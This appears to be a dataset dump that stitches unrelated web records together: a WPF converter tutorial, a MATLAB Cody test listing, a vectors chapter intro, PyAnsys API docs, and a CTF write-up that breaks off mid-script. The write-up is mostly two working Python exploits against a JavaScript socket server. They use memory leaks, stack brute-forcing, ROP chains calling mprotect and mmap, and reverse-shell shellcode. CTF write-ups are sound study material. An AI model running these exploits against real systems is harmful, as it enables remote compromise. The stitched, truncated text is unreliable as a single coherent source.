Columns: URL (string, 15 to 1.68k chars), text_list (list, 1 to 199 items), image_list (list, 1 to 199 items), metadata (string, 1.19k to 3.08k chars)
https://www.c-sharpcorner.com/UploadFile/41e70f/converters-in-wpf/
[ "# Converters In WPF\n\nConverters provide substantial supremacy since they allow insertion of an object between a source and a target object. At a high level, converters are a chunk of custom code hooked up using the binding and the data will flow via that converter. So, whenever data is flown from a source to a target, one can change the value or can change the type of object that needs to be set on the target property.\n\nSo, whenever data travels from source to target, it can be transformed in two ways:\n\n1. Data value: Here the transformation will be done with just the value by keeping the data type intact. For example, for number fields, you can transform a value from a floating point number to an integer by keeping the actual value as a float.\n2. Data type: One can also transform the data type. For example, setting a style based on some Boolean flag. This is one of the most common examples, isn't it?\n\nDefining a converter\n\nDefining any converter requires implementation of an IValueConverter interface in a class. This interface has the following two methods:\n\n1. Convert: Is called when data is flowing from a source to a target\n2. ConvertBack: Is called when data is flowing from a target to a source. It is basically useful in two-way binding scenarios.\n\nWhere to place converters\n\nTo implement an IValueConverter one must create a class and then put the instance of that class in a ResourceDictionary within your UI.\n\nHow to use\n\nOnce your class is part of a ResourceDictionary, you can point to the instance of the converter using the Converter property of Binding, along with a StaticResource markup extension.\n\nUsing Code\n\nBefore digging into the code, let's discuss what I want to do with the following code snippet. Whenever the value entered by the user is negative, I want to display 0 with * as a final amount.\n\nSo, let's start by creating a class called RoundingOffConverter and inherit IValueConverter as shown below:\n\nIn the class above, the Convert method will be called when the direction of data flow is from a source to a target. The value object is the one that we will set here, the targetType will tell you the type of the target property, next is an optional parameter and the last one is for culture.\n\nThe ConvertBack method will be called when you have two-way data binding and the direction of data flow is from the target to the source object.\n\nCode for using Data Value\n\nSo, to satisfy our requirements, let's replace the default convert methods to our own implementation as in the following:\n\nTo make this example simple, I am simply creating 2 properties in code behind as in the following:\n\nNow coming to XAML, first I need to add a reference of my converter class and then need to add that as a resource. It goes, here:\n\nOnce the reference is added, I need to bind this converter to my TextBox object as in the following:\n\nOnce everything is in place, let's run this application. You will find the following output:\n\nCode for using Data Type: Here the purpose is to select a style based on a Boolean property, or in other words, the user wants to change the color of a text box based on the checkbox status. So let's proceed to and write our BoolToStyleConverter.\n\nAs before, quickly create a class for this new converter as in the following:\n\nThe next step is to create styles in App.xaml. 
It can be done as in the following:\n\nNow in order to use the styles above in an application, one must add these as a Window Resources as shown below:\n\nOnce the converter is added to resources, the next step is to use this converter in our UI. So, let's add:\n\nWe are done. Now quickly run this application and you will find the color change based on the text box as in the following:\n\nI hope this tutorial on converters was useful.\n\nRecommended Ebook", null, "# WPF Simplified: Build Windows Apps Using C# and XAML", null, "", null, "" ]
[ null, "https://f4n3x6c5.stackpathcdn.com/UploadFile/EBooks/08192022071824AM/11162022111110AM08192022072003AMEbook-Cover---WPF-Simplified-Fundamental-approach-to-WP-F--Basics-to-Advance.png", null, "https://www.c-sharpcorner.com/images/category/trophy.png", null, "https://www.c-sharpcorner.com/images/category/certificates-img.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90743506,"math_prob":0.7476819,"size":3758,"snap":"2022-40-2023-06","text_gpt3_token_len":794,"char_repetition_ratio":0.13771977,"word_repetition_ratio":0.03106509,"special_character_ratio":0.20516232,"punctuation_ratio":0.10079575,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9622596,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,2,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-06T23:05:31Z\",\"WARC-Record-ID\":\"<urn:uuid:92ee1a1d-5dc0-45c4-88f3-20a6c84f4d5e>\",\"Content-Length\":\"165141\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:975bb289-7f31-4f53-a11d-8d61e4ad35b5>\",\"WARC-Concurrent-To\":\"<urn:uuid:8fb4a750-6da5-41ad-b856-cdb913f2877d>\",\"WARC-IP-Address\":\"40.65.205.118\",\"WARC-Target-URI\":\"https://www.c-sharpcorner.com/UploadFile/41e70f/converters-in-wpf/\",\"WARC-Payload-Digest\":\"sha1:WJMRQGLCJ3WYEJX7AVOCDRYKHKAHDYT3\",\"WARC-Block-Digest\":\"sha1:FSBCBNUJMNQIFFTS5EQYBCF7IFL73ARR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500365.52_warc_CC-MAIN-20230206212647-20230207002647-00326.warc.gz\"}"}
https://uk.mathworks.com/matlabcentral/cody/problems/411-back-to-basics-21-matrix-replicating/solutions/466725
[ "Cody\n\n# Problem 411. Back to basics 21 - Matrix replicating\n\nSolution 466725\n\nSubmitted on 6 Jul 2014 by Nishat Savat\nThis solution is locked. To view this solution, you need to provide a solution of the same size or smaller.\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\n%% x = ; y_correct = [1 1;1 1]; assert(isequal(matrix_replication(x),y_correct))\n\n2   Pass\n%% x = [1 2;3 4]; y_correct = [1 2 1 2; 3 4 3 4; 1 2 1 2; 3 4 3 4]; assert(isequal(matrix_replication(x),y_correct))\n\n3   Pass\n%% x = [1 2]; y_correct = [1 2 1 2; 1 2 1 2]; assert(isequal(matrix_replication(x),y_correct))" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.52418226,"math_prob":0.9901351,"size":532,"snap":"2019-51-2020-05","text_gpt3_token_len":201,"char_repetition_ratio":0.16098484,"word_repetition_ratio":0.10989011,"special_character_ratio":0.42669174,"punctuation_ratio":0.13392857,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95537335,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-10T07:42:23Z\",\"WARC-Record-ID\":\"<urn:uuid:07b89b15-48ef-493b-86cb-f4c49ac85784>\",\"Content-Length\":\"73528\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2205f105-2fcc-4ef2-b46a-663920f63e43>\",\"WARC-Concurrent-To\":\"<urn:uuid:5a4a5cb1-b8b4-44a5-bbf4-cf7591d2fab0>\",\"WARC-IP-Address\":\"104.110.193.39\",\"WARC-Target-URI\":\"https://uk.mathworks.com/matlabcentral/cody/problems/411-back-to-basics-21-matrix-replicating/solutions/466725\",\"WARC-Payload-Digest\":\"sha1:H4JTOGKU5ASS3LOIQI46MQZ56IN6PIFM\",\"WARC-Block-Digest\":\"sha1:6PYW4I2CLPLE4NH6HUSNDOCLLSMDYOWG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540527010.70_warc_CC-MAIN-20191210070602-20191210094602-00151.warc.gz\"}"}
https://sites.und.edu/timothy.prescott/apex/web/apex.Ch11.Sx1.html
[ "# Chapter Introduction\n\nThis chapter introduces a new mathematical object, the vector. Defined in Section 11.2, we will see that vectors provide a powerful language for describing quantities that have magnitude and direction. A simple example of such a quantity is force: when applying a force, one is generally interested in how much force is applied (i.e., the magnitude of the force) and the direction in which the force is applied. Vectors will play an important role in many of the subsequent chapters in this text.\n\nThis chapter begins with moving our mathematics out of the plane and into “space.” That is, we begin to think mathematically not only in two dimensions, but in three. With this foundation, we can explore vectors both in the plane and in space.", null, "" ]
[ null, "http://a.ou.und.edu/servlet/OX/oucampus/ob.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9450352,"math_prob":0.88079894,"size":740,"snap":"2023-14-2023-23","text_gpt3_token_len":151,"char_repetition_ratio":0.11413044,"word_repetition_ratio":0.0,"special_character_ratio":0.2027027,"punctuation_ratio":0.12328767,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99649405,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-04T00:41:45Z\",\"WARC-Record-ID\":\"<urn:uuid:82539694-dc98-489b-afcf-40336f203ff4>\",\"Content-Length\":\"16229\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d986eaa6-62d4-4c0b-97d7-aac82b60ac15>\",\"WARC-Concurrent-To\":\"<urn:uuid:74d35d8d-54a0-44f4-a7e7-a9ac671066dc>\",\"WARC-IP-Address\":\"134.129.182.41\",\"WARC-Target-URI\":\"https://sites.und.edu/timothy.prescott/apex/web/apex.Ch11.Sx1.html\",\"WARC-Payload-Digest\":\"sha1:UFSCWIOCBCHAGJWHPB33BOFQ3JFNXMWZ\",\"WARC-Block-Digest\":\"sha1:GSWYXKIXFCLPOAF6RJMKGHPHOAANSWX5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224649348.41_warc_CC-MAIN-20230603233121-20230604023121-00045.warc.gz\"}"}
https://mapdldocs.pyansys.com/mapdl_commands/solution/_autosummary/ansys.mapdl.core.Mapdl.dsym.html
[ "# dsym¶\n\nMapdl.dsym(lab='', normal='', kcn='', **kwargs)\n\nSpecifies symmetry or antisymmetry degree-of-freedom constraints on\n\nAPDL Command: DSYM nodes.\n\nParameters\nlab\n\nSymmetry label:\n\nSYMM - Generate symmetry constraints as described below (default).\n\nASYM - Generate antisymmetry constraints as described below.\n\nnormal\n\nSurface orientation label to determine the constraint set (surface is assumed to be perpendicular to this coordinate direction in coordinate system KCN):\n\nX - Surface is normal to coordinate X direction (default). Interpreted as R\n\ndirection for non-Cartesian coordinate systems.\n\nY - Surface is normal to coordinate Y direction. θ direction for non-Cartesian\n\ncoordinate systems.\n\nZ - Surface is normal to coordinate Z direction. Φ direction for spherical or\n\ntoroidal coordinate systems.\n\nkcn\n\nReference number of global or local coordinate system used to define surface orientation.\n\nNotes\n\nSpecifies symmetry or antisymmetry degree-of-freedom constraints on the selected nodes. The nodes are first automatically rotated (any previously defined rotations on these nodes are redefined) into coordinate system KCN, then zero-valued constraints are generated, as described below, on the selected degree-of-freedom set (limited to displacement, velocity, and magnetic degrees of freedom) [DOFSEL]. Constraints are defined in the (rotated) nodal coordinate system, as usual. See the D and NROTAT commands for additional details about constraints and nodal rotations.\n\nThis command is also valid in PREP7.\n\nSymmetry or antisymmetry constraint generations are based upon the valid degrees of freedom in the model, i.e., the degrees of freedom associated with the elements attached to the nodes. The labels for degrees of freedom used in the generation depend on the Normal label.\n\nFor displacement degrees of freedom, the constraints generated are:\n\nFor velocity degrees of freedom, the constraints generated are:\n\nFor magnetic degrees of freedom, the SYMM label generates flux normal conditions (flux flows normal to the surface). Where no constraints are generated, the flux normal condition is “naturally” satisfied. The ASYM label generates flux parallel conditions (flux flows parallel to the surface)." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.79428077,"math_prob":0.90089434,"size":2219,"snap":"2022-05-2022-21","text_gpt3_token_len":454,"char_repetition_ratio":0.16072235,"word_repetition_ratio":0.0754717,"special_character_ratio":0.18927445,"punctuation_ratio":0.11716621,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96888334,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-19T02:05:16Z\",\"WARC-Record-ID\":\"<urn:uuid:f57054f0-cbf6-4e44-b60b-b8603bfb4e20>\",\"Content-Length\":\"29746\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1ef2cca3-38be-4cec-9627-8eab187f32a7>\",\"WARC-Concurrent-To\":\"<urn:uuid:c1f78431-d9c5-4dbc-abeb-b13bcf990ba0>\",\"WARC-IP-Address\":\"185.199.111.153\",\"WARC-Target-URI\":\"https://mapdldocs.pyansys.com/mapdl_commands/solution/_autosummary/ansys.mapdl.core.Mapdl.dsym.html\",\"WARC-Payload-Digest\":\"sha1:G3D5KJJK3M4D2G5JSIK7C5BE6KBZGNBZ\",\"WARC-Block-Digest\":\"sha1:CV3HCHJCZ7JSK4YM5WRTSZTFI7WMPKNO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662522741.25_warc_CC-MAIN-20220519010618-20220519040618-00574.warc.gz\"}"}
https://web2.0calc.com/questions/help-please_32924
[ "+0\n\n0\n203\n1\n\n1. Describe, using similar triangles, why a line going down from left to right has a negative slope.\n\n2.  Describe the steepness of a horizontal line using the slope ratio, RISE/RUN\n.\n\nOct 19, 2018\n\n#1\n+1\n\nHere's the second one\n\nA horizontal line  has \"0\" rise and an infinite run\n\nSo  the slope is\n\n0 / run  =   0", null, "", null, "", null, "Oct 19, 2018" ]
[ null, "https://web2.0calc.com/img/emoticons/smiley-cool.gif", null, "https://web2.0calc.com/img/emoticons/smiley-cool.gif", null, "https://web2.0calc.com/img/emoticons/smiley-cool.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86130613,"math_prob":0.82340986,"size":282,"snap":"2020-10-2020-16","text_gpt3_token_len":72,"char_repetition_ratio":0.14028777,"word_repetition_ratio":0.0,"special_character_ratio":0.25531915,"punctuation_ratio":0.11666667,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9680725,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-21T15:04:43Z\",\"WARC-Record-ID\":\"<urn:uuid:fb20c7ea-7797-49fd-985f-13970ff6e519>\",\"Content-Length\":\"22339\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cdefaac6-f56f-4351-b88a-d39afa886261>\",\"WARC-Concurrent-To\":\"<urn:uuid:aebf265a-ee9f-4c28-8689-7f8516e6e51e>\",\"WARC-IP-Address\":\"209.126.117.101\",\"WARC-Target-URI\":\"https://web2.0calc.com/questions/help-please_32924\",\"WARC-Payload-Digest\":\"sha1:JIHFLOEPHX2TWCTC6J5XUBSIUBXCS3YY\",\"WARC-Block-Digest\":\"sha1:ACAZLMJ7KHFGNYQUIM5JEJZU6VZJVLCN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875145533.1_warc_CC-MAIN-20200221142006-20200221172006-00442.warc.gz\"}"}
https://blog.stalkr.net/2011/01/shmoocon-ctf-warmup-contest-javascrimpd.html?showComment=1294978990935
[ "## Friday, January 14, 2011\n\n### ShmooCon CTF Warmup Contest - JavaScrimpd\n\nLast week-end was ShmooCon CTF Warmup Contest (aka Ghost in the Shellcode 2011). Three challenges, the last one being an ELF binary + hostname of a server.\n\nCongrats to awesie/zoaedk & tylerni7 of team PPP for solving it pretty quickly. And since they explained the level pretty well, I really invite you to read their solution.\n\n### Valuable binary information\n\nIn addition to reading the SSH banner, the binary informs us that it has been compiled under Ubuntu with gcc 4.3.3:\n```\\$ objdump -s -j .comment 063ad0c8271898d6c5e3e83701211f6-JavaScrimpd\n\nContents of section .comment:\n0000 4743433a 20285562 756e7475 20342e34 GCC: (Ubuntu 4.4\n0010 2e332d34 7562756e 74753529 20342e34 .3-4ubuntu5) 4.4\n0020 2e3300 .3.\n```\n\nand that it's using libmozjs from xulrunner package 1.9.2.13:\n```\\$ readelf -d 6063ad0c8271898d6c5e3e83701211f6-JavaScrimpd\nDynamic section at offset 0x1f10 contains 23 entries:\nTag Type Name/Value\n0x00000001 (NEEDED) Shared library: [libmozjs.so]\n0x00000001 (NEEDED) Shared library: [libc.so.6]\n0x0000000f (RPATH) Library rpath: [/usr/lib/xulrunner-1.9.2.13/]\n[...]\n```\nThese information are really valuable to work with the same libmozjs.so as the server, in order to ease remote exploitation.\n\n### Exploit using send() memory leak\n\nUsing the same techniques I made my own exploit and challenged myself to make it work under ASLR in addition to NX. In order to do that, we need to:\n• automatically calculate remote base address of libmozjs using JS's socket.send() memory leak, by trying several addresses: last 12 bits should be the same, decrementing their offset should give same base address\n• send a payload and get its address in the heap, again using socket.send() memory leak to find heap1/heap2 addresses as explained by awesie\nI tried to make the exploit code portable and verbose enough to understand. 
Also, you can give any shellcode - I used a very common shell_reverse_tcp from metasploit.\n\nExploit (3.py):\n```#!/usr/bin/env python\n# Solution for shmoocon barcode/ghost in the shellcode 2011, challenge #3\n# Based on awesie/tylerni7 solution http://ppp.cylab.cmu.edu/wordpress/?p=410\n# Automatically finds addresses => ASLR proof!\nfrom sys import argv, exit\nfrom struct import pack, unpack\nfrom socket import *\n\n# ./3.py [host (default localhost)] [port (default 2426)]\nhost = argv if len(argv)>1 else \"localhost\"\nport = int(argv) if len(argv)>2 else 2426\n\n# pivot gadget - leave (mov esp,ebp ; pop ebp) ; ret\npivot_leave = 0x8048c56\n\n# offset of mprotect@PLT in libmozjs\nmprotect_plt_offset = 0xEEF0\n# ebx value to call mprotect through GOT/PLT of shared library\n# obtained these values from libmozjs.so:.text:001359A2  add ebx, 1848Ah\nlibmozjs_ebx = 0x1359A2 + 0x1848A\n\n# some addresses of functions found locally in the memory leak\n# with the following base address for libmozjs\nba = 0xb7e78000\n\ndef connect():\ns = socket(AF_INET, SOCK_STREAM)\ns.connect((host,port))\nreturn s\n\ndef leak_js(length=0x100, string=\"AAAA\", timout=1):\ns = connect()\ns.settimeout(timout)\ns.send(\"a=new Socket();a.send('%s',%i);a.recv(0);\" % (string, length))\nr = ''\ntry:\nwhile len(r)<length:\nr += s.recv(length)\nexcept timeout, e:\npass\ns.close()\nreturn r\n\ndef build_js(p, sendsize, recvsize):\njs  = \"a=new Socket();\"\njs += \"s='%s';\" % (\"\".join(\"\\\\x%02x\"%ord(c) for c in p))\njs += \"a.send(s,%i);\" % sendsize\njs += \"a.recv(%i);\" % recvsize\nreturn (js+\"//\").ljust(1024,\"X\")\n\n# 00000000  41 42 42 42 00 14 e8 b7  77 00 20 00 19 00 00 00  |ABBB....w. .....|\n# 00000010  00 00 00 00 60 e4 00 01  00 23 07 08 c8 3d 07 08  |....`....#...=..|\n#            heap1       heap2, points to buffer=ABBB\n# obtain heap1/heap2 addresses with simple buffer\nmem = leak_js(0x20, \"ABBB\")\nheap1 = unpack(\"<I\", mem[-8:-4])\nheap2 = unpack(\"<I\", mem[-4:])\nif mem[0:4]==\"ABBB\" and (heap1>>16)==(heap2>>16):\nhigher_bytes = pack(\"<H\", heap1>>16)\n# for some length, heap doesn't display heap1/heap2 addresses\n# so try to pad our payload until it displays it and we find it\nfor i in range(32):\ns = connect()\ns.send(build_js(\"A\"+\"B\"*(send-1), send+leak, 0))\nmem = s.recv(send+leak)\ns.close()\n# try to find heap1/heap2 by matching higher bytes found previously\nh = mem.find(higher_bytes, send)\nheap1 = unpack(\"<I\", mem[h-2:h+2])\nheap2 = unpack(\"<I\", mem[h+2:h+6])\nif (heap1>>16)==(heap2>>16):\nreturn heap2, i\nsend += 1\nprint 'unable to find heap address of buffer'\nexit(1)\n\ndef get_libmozjs_ba():\nmem = leak_js(0x5000)\nguess1, guess2, guess3 = 0,0,0\nfor i in range(0,len(mem),4):\na = unpack(\"<I\", mem[i:i+4])\n# try to match addresses we found locally and for\n# which we calculated offset to library base address\nguess1 = a - (addr1 - ba)\nguess2 = a - (addr2 - ba)\nguess3 = a - (addr3 - ba)\nif guess1>0 and guess2>0 and guess3>0 and guess1==guess2==guess3:\nreturn guess1\nprint 'unable to get libmozjs base address'\nexit(1)\n\ndef exploit(SC):\nrop  = \"MPRO\"\nrop += \"RETN\" # where to return after call\nrop += \"HEAP\" # const void *addr\nrop += pack(\"<I\", 0x1000) # size_t len\nrop += pack(\"<I\", 0x7) # int prot\n\nlibmozjs_ba = get_libmozjs_ba()\nprint \"Assuming libmozjs base address at 0x%08x\" % libmozjs_ba\n\nleak = 64\nprint \"Assuming heap buffer at 0x%08x with %i padding\" % (heap, pad)\n\n# mprotect@plt offset\nmprotect = libmozjs_ba + 
mprotect_plt_offset\n# fix ebx for call\nebx = libmozjs_ba + libmozjs_ebx\n\nrop = rop.replace(\"MPRO\", pack(\"<I\",mprotect))\nrop = rop.replace(\"HEAP\", pack(\"<I\",heap))\nrop = rop.replace(\"RETN\", pack(\"<I\",heap+len(rop)))\n\n# stack-based buffer overflow\np  = \"A\"*1052\np += pack(\"<I\",ebx) # ebx\np += pack(\"<I\",heap-4) # sebp, address of new stack\np += pack(\"<I\",pivot_leave) # seip, pivot (leave; ret)\n\ns = connect()\ns.send(build_js(rop+SC, len(rop+SC)+leak, len(p)))\ns.send(p)\ns.close()\nprint \"Done. Have shell?\"\n\n# Shellcode to use\n# msfpayload linux/x86/shell_reverse_tcp LHOST=\"127.0.0.1\" LPORT=\"1337\" R |hexdump -ve '\"\\\\\\x\" 1/1 \"%02x\"'; echo;\nSC = \"\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x5b\\x5e\\x68\\x7f\\x00\\x00\\x01\\x66\\x68\\x05\\x39\\x66\\x53\\x6a\\x10\\x51\\x50\\x89\\xe1\\x43\\x6a\\x66\\x58\\xcd\\x80\\x59\\x87\\xd9\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"\n\nexploit(SC)```\n\nIt gives:\n```\\$ ./3.py\nAssuming libmozjs base address at 0xb7673000\nAssuming heap buffer at 0x08ccfe30 with 0 padding\nDone. Have shell?\n# and new connection appears in the listening netcat\n```\n\n### Exploit not using send() memory leak: stack brute-force\n\nBack to recv() stack-based buffer overflow. Right after the saved instruction pointer (seip) is the first arg of the function - a pointer to JS context - which is used before reaching ret (by JS_strdup() and JS_newstring()). This is why we could not overwrite it and have a regular exploitation and had to use a leave/ret stack pivot into our buffer inside the JS code with our new stack.\n\nWe could overwrite context if we had its value. But how to get it without any memory leak? We can just brute-force it as if it was a stack cookie (see pi3's article in phrack #67). To distinguish good from bad results, we can add a send(\"it works\") in the JS code after the recv(). If we receive \"it works\" it means we correctly guessed context value, timeout meaning we failed. But doing this we also smash the saved base pointer (sebp) and saved instruction pointer (seip), so we need their value first. How? Same method, brute-force. All in all we have a 12 bytes byte per byte brute-force.\n\nNote: the stack brute-force works here because the server uses recv() (no extra character being added like with fgets()) and also because it only forks() and does not execve() itself again (in that case ASLR would change all addresses). In local it takes about 2 minutes to brute-force the 12-bytes (min 12 tries, max 256*12=3072 tries).\n\nWhat next? After using a pop+ret gadget to skip context and other stack variables that are unusable, we now have a regular stack-based buffer overflow. We can then return to send@PLT to send us back any memory area! The only problem is to provide the correct file descriptor, the one of our socket. Actually we can get it by using JS send(socket.fileno) before calling recv(), so we can send our buffer overflow payload using its value.\n\nSo now we have an arbitrary memory leak. Let's not fall into the first solution using libmozjs and choose another approach. Since the binary is not position independent, we know where it is mapped in memory, especially its GOT (Global Offset Table) section. There, we can find function pointers already resolved (since already called) and directly pointing to the libc: signal(), recv(), listen(), setuid(), etc. 
Assuming we have the same libc (we guessed Ubuntu version), we can then deduce remote libc base address.\n\nWhat if it is not the same libc but an obscure and different one? We can guess its base address and leak its content remotely using our arbitrary memory leak. Once fully obtained, we can read its content and find what we need.\n\nNow that we have access to any libc function, many solutions are possible. I chose to mmap() an rwx area, download a shellcode over the socket using recv() (with the same socket fileno leak I explained before) and return to it.\n\nAgain, I tried to make the exploit code portable and verbose enough to understand. Again, you can give any shellcode, I used the same connect-back as before.\n\nExploit (3b.py):\n```#!/usr/bin/env python\n# Solution for shmoocon barcode/ghost in the shellcode 2011, challenge #3\n# It does not use JS send() memory leak but brute-forces the stack (like an\n# SSP brute-force), so it becomes a regular stack-based buffer overflow.\n# We use send() to leak remote process memory and use this to find remote libc\n# base address by looking at resolved libc functions in binary's .got section.\n# Finally mmap() ourselves an rwx area, recv() a shellcode and return to it.\nfrom sys import argv, exit\nfrom struct import pack, unpack\nfrom time import sleep\nfrom socket import *\n\n# ./3b.py [host (default localhost)] [port (default 2426)]\nhost = argv if len(argv)>1 else \"localhost\"\nport = int(argv) if len(argv)>2 else 2426\n\npop_11 = 0x8049812 # add esp 0x1c (28) ; pop ebx ; pop esi ; pop edi ; pop ebp ;;\npop_4 = 0x8049815 # pop ebx ; pop esi ; pop edi ; pop ebp ;;\nsend_plt = 0x08048E98\nrecv_plt = 0x08048CB8\nexit_plt = 0x08048F58\n\ngot_plt_start, got_plt_end = 0x0804AFF4, 0x0804B0C8\n# Some libc functions already resolved by GOT/PLT\n# by the time we smash the stack\nsignal_got = 0x0804B00C\nrecv_got   = 0x0804B014\nlisten_got = 0x0804B01C\n\n# Functions in my libc and its base address during a local run\nmy_signal = 0xb7d48530\nmy_recv   = 0xb7deccb0\nmy_listen = 0xb7decc70\nmy_mmap   = 0xb7de7ee0\nmy_libc_ba = 0xb7d1e000\n\ndef connect():\ns = socket(AF_INET, SOCK_STREAM)\ns.connect((host,port))\nreturn s\n\ndef alive():\ns = connect()\ns.send(\"a=new Socket();a.send('ping\\\\n');\")\nr = s.recv(5)\ns.close()\nreturn r=='ping\\n'\n\ndef leak_js(length=0x100, string=\"AAAA\", timout=1):\ns = connect()\ns.settimeout(timout)\ns.send(\"a=new Socket();a.send('%s',%i);a.recv(0);\" % (string, length))\nr = ''\ntry:\nwhile len(r)<length:\nr += s.recv(length)\nexcept timeout, e:\npass\ns.close()\nreturn r\n\ndef try_byte(current, byte, timout=0.3):\ns = connect()\ns.settimeout(timout)\np = \"A\"*(1056) + current + byte\nfound = False\ntry:\ns.send((\"a=new Socket();a.recv(\"+str(len(p))+\");a.send('HAI\\\\n')//\").ljust(1024,\"X\"))\ns.send(p)\nfound = s.recv(4)==\"HAI\\n\"\nexcept timeout, e:\npass\ns.close()\nreturn found\n\ndef find_byte(current, first_check=[]):\ntimout = 0.2 if host==\"localhost\" else 0.6\nfound = False\nfor i in first_check+list(set(range(256))-set(first_check)):\nif try_byte(current, chr(i), timout):\nfound = True\nprint \" * found byte 0x%02x\" % i\nreturn chr(i)\ntimout *= 2\nif alive():\nelse:\nexit(1)\n\ndef bf_stack():\nprint \"Brute-forcing the stack to get sebp, seip & context addresses\"\nsebp = ''\nsebp += find_byte(sebp,[0x68])\nsebp += find_byte(sebp,[0xeb])\nsebp += find_byte(sebp,[0xff])\nsebp += find_byte(sebp,[0xbf])\nseip = ''\nseip += find_byte(sebp+seip,[0xa7])\nseip += 
find_byte(sebp+seip,[0x47])\nseip += find_byte(sebp+seip,[0xee])\nseip += find_byte(sebp+seip,[0xb7])\ncontext = ''\ncontext += find_byte(sebp+seip+context,[0xd0])\ncontext += find_byte(sebp+seip+context,[0x56])\ncontext += find_byte(sebp+seip+context,[0x05])\ncontext += find_byte(sebp+seip+context,[0x08])\nsebp, seip, context = unpack(\"<I\",sebp), unpack(\"<I\",seip), unpack(\"<I\",context)\nprint \"Found: sebp, seip, context = 0x%08x, 0x%08x, 0x%08x\" % (sebp, seip, context)\nreturn (sebp, seip, context)\n\np = \"A\"*1060\np += pack(\"<I\", pop_11) # seip\np += pack(\"<I\", context) # do not smash context\np += pack(\"<I\", 0)*3 # unused\np += pack(\"<I\", context-4) # something writeable\np += pack(\"<I\", 0)*(11-5) # unused\nreturn p # after that goes the rop payload\n\ndef leak_mem(start,length):\np += pack(\"<I\", send_plt)\np += pack(\"<I\", pop_4)\np += \"FDNO\" # int fd\np += pack(\"<I\", start) # void *buf\np += pack(\"<I\", length) # size_t n\np += pack(\"<I\", 0) # int flags\np += pack(\"<I\", exit_plt)\n\ns = connect()\ns.send((\"a=new Socket();a.send(a.fileno);a.recv(\"+str(len(p))+\");//\").ljust(1024,\"X\"))\nfileno = unpack(\"<I\", s.recv(4))\np = p.replace(\"FDNO\", pack(\"<I\",fileno))\ns.send(p)\nr = ''\ntry:\nwhile len(r)<length:\nr += s.recv(length)\nexcept timeout, e:\npass\ns.close()\nreturn r\n\ndef get_libc_ba():\nmem = leak_mem(got_plt_start, got_plt_end-got_plt_start)\n\nsignal = unpack(\"<I\", mem[signal_got-got_plt_start:signal_got-got_plt_start+4])\nrecv   = unpack(\"<I\", mem[recv_got-got_plt_start:recv_got-got_plt_start+4])\nlisten = unpack(\"<I\", mem[listen_got-got_plt_start:listen_got-got_plt_start+4])\n\nguess1 = signal - (my_signal - my_libc_ba)\nguess2 = recv   - (my_recv   - my_libc_ba)\nguess3 = listen - (my_listen - my_libc_ba)\nif guess1==guess2==guess3:\nreturn guess1\nprint \"Could not find remote libc base address - maybe different version?\"\nprint \"You can try to leak it using leak_mem() progressively, then explore it to find needed offsets you need\"\nexit(1)\n\ndef exploit(SC, area=0x13370000, size=0x10000):\n\n# mmap an rwx area at 0x13370000\np += pack(\"<I\", libc + (my_mmap - my_libc_ba))\np += pack(\"<I\", pop_11)\np += pack(\"<I\", area) # void *addr\np += pack(\"<I\", size) # size_t length\np += pack(\"<I\", 0x7) # int prot - PROT_READ(0x1) | PROT_WRITE(0x2) | PROT_EXEC(0x4)\np += pack(\"<I\", 0x22) # int flags - MAP_ANONYMOUS(0x20) | MAP_PRIVATE(0x02)\np += pack(\"<I\", 0xffffffff) # int fd - MAP_ANONYMOUS => -1\np += pack(\"<I\", 0) # off_t offset\np += pack(\"<I\", 0)*(11-6) # unused\n\n# receive a shellcode in it\np += pack(\"<I\", recv_plt)\np += pack(\"<I\", 